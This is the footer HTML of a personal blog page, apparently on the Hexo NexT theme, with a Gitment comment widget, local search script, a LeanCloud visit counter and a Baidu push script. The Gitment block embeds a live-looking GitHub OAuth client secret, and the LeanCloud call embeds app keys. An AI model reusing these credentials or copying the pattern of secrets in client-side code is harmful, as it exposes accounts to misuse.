|
|
|||
|
|
|||
|
<script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>
|
|||
|
|
|||
|
<script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>
|
|||
|
|
|||
|
<script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
|
|||
|
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<!-- LOCAL: You can save these files to your site and update links -->
|
|||
|
|
|||
|
|
|||
|
<link rel="stylesheet" href="https://jjeejj.github.io/css/gitment.css">
|
|||
|
<script src="https://jjeejj.github.io/js/gitment.js"></script>
|
|||
|
|
|||
|
<!-- END LOCAL -->
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript">
|
|||
|
function renderGitment(){
|
|||
|
var gitment = new Gitment({
|
|||
|
id: window.location.pathname,
|
|||
|
owner: 'Cool-Y',
|
|||
|
repo: 'gitment-comments',
|
|||
|
|
|||
|
oauth: {
|
|||
|
|
|||
|
|
|||
|
client_secret: '1c5db4da72df5e6fc318d12afe5f4406f7c54343',
|
|||
|
|
|||
|
client_id: '180955a2c3ae3d966d9a'
|
|||
|
}});
|
|||
|
gitment.render('gitment-container');
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
renderGitment();
|
|||
|
|
|||
|
</script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script type="text/javascript">
|
|||
|
// Popup Window;
|
|||
|
var isfetched = false;
|
|||
|
var isXml = true;
|
|||
|
// Search DB path;
|
|||
|
var search_path = "search.xml";
|
|||
|
if (search_path.length === 0) {
|
|||
|
search_path = "search.xml";
|
|||
|
} else if (/json$/i.test(search_path)) {
|
|||
|
isXml = false;
|
|||
|
}
|
|||
|
var path = "/" + search_path;
|
|||
|
// monitor main search box;
|
|||
|
|
|||
|
var onPopupClose = function (e) {
|
|||
|
$('.popup').hide();
|
|||
|
$('#local-search-input').val('');
|
|||
|
$('.search-result-list').remove();
|
|||
|
$('#no-result').remove();
|
|||
|
$(".local-search-pop-overlay").remove();
|
|||
|
$('body').css('overflow', '');
|
|||
|
}
|
|||
|
|
|||
|
function proceedsearch() {
|
|||
|
$("body")
|
|||
|
.append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
|
|||
|
.css('overflow', 'hidden');
|
|||
|
$('.search-popup-overlay').click(onPopupClose);
|
|||
|
$('.popup').toggle();
|
|||
|
var $localSearchInput = $('#local-search-input');
|
|||
|
$localSearchInput.attr("autocapitalize", "none");
|
|||
|
$localSearchInput.attr("autocorrect", "off");
|
|||
|
$localSearchInput.focus();
|
|||
|
}
|
|||
|
|
|||
|
// search function;
|
|||
|
var searchFunc = function(path, search_id, content_id) {
|
|||
|
'use strict';
|
|||
|
|
|||
|
// start loading animation
|
|||
|
$("body")
|
|||
|
.append('<div class="search-popup-overlay local-search-pop-overlay">' +
|
|||
|
'<div id="search-loading-icon">' +
|
|||
|
'<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
|
|||
|
'</div>' +
|
|||
|
'</div>')
|
|||
|
.css('overflow', 'hidden');
|
|||
|
$("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');
|
|||
|
|
|||
|
$.ajax({
|
|||
|
url: path,
|
|||
|
dataType: isXml ? "xml" : "json",
|
|||
|
async: true,
|
|||
|
success: function(res) {
|
|||
|
// get the contents from search data
|
|||
|
isfetched = true;
|
|||
|
$('.popup').detach().appendTo('.header-inner');
|
|||
|
var datas = isXml ? $("entry", res).map(function() {
|
|||
|
return {
|
|||
|
title: $("title", this).text(),
|
|||
|
content: $("content",this).text(),
|
|||
|
url: $("url" , this).text()
|
|||
|
};
|
|||
|
}).get() : res;
|
|||
|
var input = document.getElementById(search_id);
|
|||
|
var resultContent = document.getElementById(content_id);
|
|||
|
var inputEventFunction = function() {
|
|||
|
var searchText = input.value.trim().toLowerCase();
|
|||
|
var keywords = searchText.split(/[\s\-]+/);
|
|||
|
if (keywords.length > 1) {
|
|||
|
keywords.push(searchText);
|
|||
|
}
|
|||
|
var resultItems = [];
|
|||
|
if (searchText.length > 0) {
|
|||
|
// perform local searching
|
|||
|
datas.forEach(function(data) {
|
|||
|
var isMatch = false;
|
|||
|
var hitCount = 0;
|
|||
|
var searchTextCount = 0;
|
|||
|
var title = data.title.trim();
|
|||
|
var titleInLowerCase = title.toLowerCase();
|
|||
|
var content = data.content.trim().replace(/<[^>]+>/g,"");
|
|||
|
var contentInLowerCase = content.toLowerCase();
|
|||
|
var articleUrl = decodeURIComponent(data.url);
|
|||
|
var indexOfTitle = [];
|
|||
|
var indexOfContent = [];
|
|||
|
// only match articles with not empty titles
|
|||
|
if(title != '') {
|
|||
|
keywords.forEach(function(keyword) {
|
|||
|
function getIndexByWord(word, text, caseSensitive) {
|
|||
|
var wordLen = word.length;
|
|||
|
if (wordLen === 0) {
|
|||
|
return [];
|
|||
|
}
|
|||
|
var startPosition = 0, position = [], index = [];
|
|||
|
if (!caseSensitive) {
|
|||
|
text = text.toLowerCase();
|
|||
|
word = word.toLowerCase();
|
|||
|
}
|
|||
|
while ((position = text.indexOf(word, startPosition)) > -1) {
|
|||
|
index.push({position: position, word: word});
|
|||
|
startPosition = position + wordLen;
|
|||
|
}
|
|||
|
return index;
|
|||
|
}
|
|||
|
|
|||
|
indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
|
|||
|
indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
|
|||
|
});
|
|||
|
if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
|
|||
|
isMatch = true;
|
|||
|
hitCount = indexOfTitle.length + indexOfContent.length;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
// show search results
|
|||
|
|
|||
|
if (isMatch) {
|
|||
|
// sort index by position of keyword
|
|||
|
|
|||
|
[indexOfTitle, indexOfContent].forEach(function (index) {
|
|||
|
index.sort(function (itemLeft, itemRight) {
|
|||
|
if (itemRight.position !== itemLeft.position) {
|
|||
|
return itemRight.position - itemLeft.position;
|
|||
|
} else {
|
|||
|
return itemLeft.word.length - itemRight.word.length;
|
|||
|
}
|
|||
|
});
|
|||
|
});
|
|||
|
|
|||
|
// merge hits into slices
|
|||
|
|
|||
|
function mergeIntoSlice(text, start, end, index) {
|
|||
|
var item = index[index.length - 1];
|
|||
|
var position = item.position;
|
|||
|
var word = item.word;
|
|||
|
var hits = [];
|
|||
|
var searchTextCountInSlice = 0;
|
|||
|
while (position + word.length <= end && index.length != 0) {
|
|||
|
if (word === searchText) {
|
|||
|
searchTextCountInSlice++;
|
|||
|
}
|
|||
|
hits.push({position: position, length: word.length});
|
|||
|
var wordEnd = position + word.length;
|
|||
|
|
|||
|
// move to next position of hit
|
|||
|
|
|||
|
index.pop();
|
|||
|
while (index.length != 0) {
|
|||
|
item = index[index.length - 1];
|
|||
|
position = item.position;
|
|||
|
word = item.word;
|
|||
|
if (wordEnd > position) {
|
|||
|
index.pop();
|
|||
|
} else {
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
searchTextCount += searchTextCountInSlice;
|
|||
|
return {
|
|||
|
hits: hits,
|
|||
|
start: start,
|
|||
|
end: end,
|
|||
|
searchTextCount: searchTextCountInSlice
|
|||
|
};
|
|||
|
}
|
|||
|
|
|||
|
var slicesOfTitle = [];
|
|||
|
if (indexOfTitle.length != 0) {
|
|||
|
slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
|
|||
|
}
|
|||
|
|
|||
|
var slicesOfContent = [];
|
|||
|
while (indexOfContent.length != 0) {
|
|||
|
var item = indexOfContent[indexOfContent.length - 1];
|
|||
|
var position = item.position;
|
|||
|
var word = item.word;
|
|||
|
// cut out 100 characters
|
|||
|
var start = position - 20;
|
|||
|
var end = position + 80;
|
|||
|
if(start < 0){
|
|||
|
start = 0;
|
|||
|
}
|
|||
|
if (end < position + word.length) {
|
|||
|
end = position + word.length;
|
|||
|
}
|
|||
|
if(end > content.length){
|
|||
|
end = content.length;
|
|||
|
}
|
|||
|
slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
|
|||
|
}
|
|||
|
|
|||
|
// sort slices in content by search text's count and hits' count
|
|||
|
|
|||
|
slicesOfContent.sort(function (sliceLeft, sliceRight) {
|
|||
|
if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
|
|||
|
return sliceRight.searchTextCount - sliceLeft.searchTextCount;
|
|||
|
} else if (sliceLeft.hits.length !== sliceRight.hits.length) {
|
|||
|
return sliceRight.hits.length - sliceLeft.hits.length;
|
|||
|
} else {
|
|||
|
return sliceLeft.start - sliceRight.start;
|
|||
|
}
|
|||
|
});
|
|||
|
|
|||
|
// select top N slices in content
|
|||
|
|
|||
|
var upperBound = parseInt('1');
|
|||
|
if (upperBound >= 0) {
|
|||
|
slicesOfContent = slicesOfContent.slice(0, upperBound);
|
|||
|
}
|
|||
|
|
|||
|
// highlight title and content
|
|||
|
|
|||
|
function highlightKeyword(text, slice) {
|
|||
|
var result = '';
|
|||
|
var prevEnd = slice.start;
|
|||
|
slice.hits.forEach(function (hit) {
|
|||
|
result += text.substring(prevEnd, hit.position);
|
|||
|
var end = hit.position + hit.length;
|
|||
|
result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
|
|||
|
prevEnd = end;
|
|||
|
});
|
|||
|
result += text.substring(prevEnd, slice.end);
|
|||
|
return result;
|
|||
|
}
|
|||
|
|
|||
|
var resultItem = '';
|
|||
|
|
|||
|
if (slicesOfTitle.length != 0) {
|
|||
|
resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
|
|||
|
} else {
|
|||
|
resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
|
|||
|
}
|
|||
|
|
|||
|
slicesOfContent.forEach(function (slice) {
|
|||
|
resultItem += "<a href='" + articleUrl + "'>" +
|
|||
|
"<p class=\"search-result\">" + highlightKeyword(content, slice) +
|
|||
|
"...</p>" + "</a>";
|
|||
|
});
|
|||
|
|
|||
|
resultItem += "</li>";
|
|||
|
resultItems.push({
|
|||
|
item: resultItem,
|
|||
|
searchTextCount: searchTextCount,
|
|||
|
hitCount: hitCount,
|
|||
|
id: resultItems.length
|
|||
|
});
|
|||
|
}
|
|||
|
})
|
|||
|
};
|
|||
|
if (keywords.length === 1 && keywords[0] === "") {
|
|||
|
resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
|
|||
|
} else if (resultItems.length === 0) {
|
|||
|
resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
|
|||
|
} else {
|
|||
|
resultItems.sort(function (resultLeft, resultRight) {
|
|||
|
if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
|
|||
|
return resultRight.searchTextCount - resultLeft.searchTextCount;
|
|||
|
} else if (resultLeft.hitCount !== resultRight.hitCount) {
|
|||
|
return resultRight.hitCount - resultLeft.hitCount;
|
|||
|
} else {
|
|||
|
return resultRight.id - resultLeft.id;
|
|||
|
}
|
|||
|
});
|
|||
|
var searchResultList = '<ul class=\"search-result-list\">';
|
|||
|
resultItems.forEach(function (result) {
|
|||
|
searchResultList += result.item;
|
|||
|
})
|
|||
|
searchResultList += "</ul>";
|
|||
|
resultContent.innerHTML = searchResultList;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
if ('auto' === 'auto') {
|
|||
|
input.addEventListener('input', inputEventFunction);
|
|||
|
} else {
|
|||
|
$('.search-icon').click(inputEventFunction);
|
|||
|
input.addEventListener('keypress', function (event) {
|
|||
|
if (event.keyCode === 13) {
|
|||
|
inputEventFunction();
|
|||
|
}
|
|||
|
});
|
|||
|
}
|
|||
|
|
|||
|
// remove loading animation
|
|||
|
$(".local-search-pop-overlay").remove();
|
|||
|
$('body').css('overflow', '');
|
|||
|
|
|||
|
proceedsearch();
|
|||
|
}
|
|||
|
});
|
|||
|
}
|
|||
|
|
|||
|
// handle and trigger popup window;
|
|||
|
$('.popup-trigger').click(function(e) {
|
|||
|
e.stopPropagation();
|
|||
|
if (isfetched === false) {
|
|||
|
searchFunc(path, 'local-search-input', 'local-search-result');
|
|||
|
} else {
|
|||
|
proceedsearch();
|
|||
|
};
|
|||
|
});
|
|||
|
|
|||
|
$('.popup-btn-close').click(onPopupClose);
|
|||
|
$('.popup').click(function(e){
|
|||
|
e.stopPropagation();
|
|||
|
});
|
|||
|
$(document).on('keyup', function (event) {
|
|||
|
var shouldDismissSearchPopup = event.which === 27 &&
|
|||
|
$('.search-popup').is(':visible');
|
|||
|
if (shouldDismissSearchPopup) {
|
|||
|
onPopupClose();
|
|||
|
}
|
|||
|
});
|
|||
|
</script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
|
|||
|
<script>AV.initialize("EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz", "x8FxDrYG79C8YFrTww9ljo8K");</script>
|
|||
|
<script>
|
|||
|
function showTime(Counter) {
|
|||
|
var query = new AV.Query(Counter);
|
|||
|
var entries = [];
|
|||
|
var $visitors = $(".leancloud_visitors");
|
|||
|
|
|||
|
$visitors.each(function () {
|
|||
|
entries.push( $(this).attr("id").trim() );
|
|||
|
});
|
|||
|
|
|||
|
query.containedIn('url', entries);
|
|||
|
query.find()
|
|||
|
.done(function (results) {
|
|||
|
var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
|
|||
|
|
|||
|
if (results.length === 0) {
|
|||
|
$visitors.find(COUNT_CONTAINER_REF).text(0);
|
|||
|
return;
|
|||
|
}
|
|||
|
|
|||
|
for (var i = 0; i < results.length; i++) {
|
|||
|
var item = results[i];
|
|||
|
var url = item.get('url');
|
|||
|
var time = item.get('time');
|
|||
|
var element = document.getElementById(url);
|
|||
|
|
|||
|
$(element).find(COUNT_CONTAINER_REF).text(time);
|
|||
|
}
|
|||
|
for(var i = 0; i < entries.length; i++) {
|
|||
|
var url = entries[i];
|
|||
|
var element = document.getElementById(url);
|
|||
|
var countSpan = $(element).find(COUNT_CONTAINER_REF);
|
|||
|
if( countSpan.text() == '') {
|
|||
|
countSpan.text(0);
|
|||
|
}
|
|||
|
}
|
|||
|
})
|
|||
|
.fail(function (object, error) {
|
|||
|
console.log("Error: " + error.code + " " + error.message);
|
|||
|
});
|
|||
|
}
|
|||
|
|
|||
|
function addCount(Counter) {
|
|||
|
var $visitors = $(".leancloud_visitors");
|
|||
|
var url = $visitors.attr('id').trim();
|
|||
|
var title = $visitors.attr('data-flag-title').trim();
|
|||
|
var query = new AV.Query(Counter);
|
|||
|
|
|||
|
query.equalTo("url", url);
|
|||
|
query.find({
|
|||
|
success: function(results) {
|
|||
|
if (results.length > 0) {
|
|||
|
var counter = results[0];
|
|||
|
counter.fetchWhenSave(true);
|
|||
|
counter.increment("time");
|
|||
|
counter.save(null, {
|
|||
|
success: function(counter) {
|
|||
|
var $element = $(document.getElementById(url));
|
|||
|
$element.find('.leancloud-visitors-count').text(counter.get('time'));
|
|||
|
},
|
|||
|
error: function(counter, error) {
|
|||
|
console.log('Failed to save Visitor num, with error message: ' + error.message);
|
|||
|
}
|
|||
|
});
|
|||
|
} else {
|
|||
|
var newcounter = new Counter();
|
|||
|
/* Set ACL */
|
|||
|
var acl = new AV.ACL();
|
|||
|
acl.setPublicReadAccess(true);
|
|||
|
acl.setPublicWriteAccess(true);
|
|||
|
newcounter.setACL(acl);
|
|||
|
/* End Set ACL */
|
|||
|
newcounter.set("title", title);
|
|||
|
newcounter.set("url", url);
|
|||
|
newcounter.set("time", 1);
|
|||
|
newcounter.save(null, {
|
|||
|
success: function(newcounter) {
|
|||
|
var $element = $(document.getElementById(url));
|
|||
|
$element.find('.leancloud-visitors-count').text(newcounter.get('time'));
|
|||
|
},
|
|||
|
error: function(newcounter, error) {
|
|||
|
console.log('Failed to create');
|
|||
|
}
|
|||
|
});
|
|||
|
}
|
|||
|
},
|
|||
|
error: function(error) {
|
|||
|
console.log('Error:' + error.code + " " + error.message);
|
|||
|
}
|
|||
|
});
|
|||
|
}
|
|||
|
|
|||
|
$(function() {
|
|||
|
var Counter = AV.Object.extend("Counter");
|
|||
|
if ($('.leancloud_visitors').length == 1) {
|
|||
|
addCount(Counter);
|
|||
|
} else if ($('.post-title-link').length > 1) {
|
|||
|
showTime(Counter);
|
|||
|
}
|
|||
|
});
|
|||
|
</script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script>
|
|||
|
(function(){
|
|||
|
var bp = document.createElement('script');
|
|||
|
var curProtocol = window.location.protocol.split(':')[0];
|
|||
|
if (curProtocol === 'https') {
|
|||
|
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
|
|||
|
}
|
|||
|
else {
|
|||
|
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
|
|||
|
}
|
|||
|
var s = document.getElementsByTagName("script")[0];
|
|||
|
s.parentNode.insertBefore(bp, s);
|
|||
|
})();
|
|||
|
</script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</body>
|
|||
|
</html>
|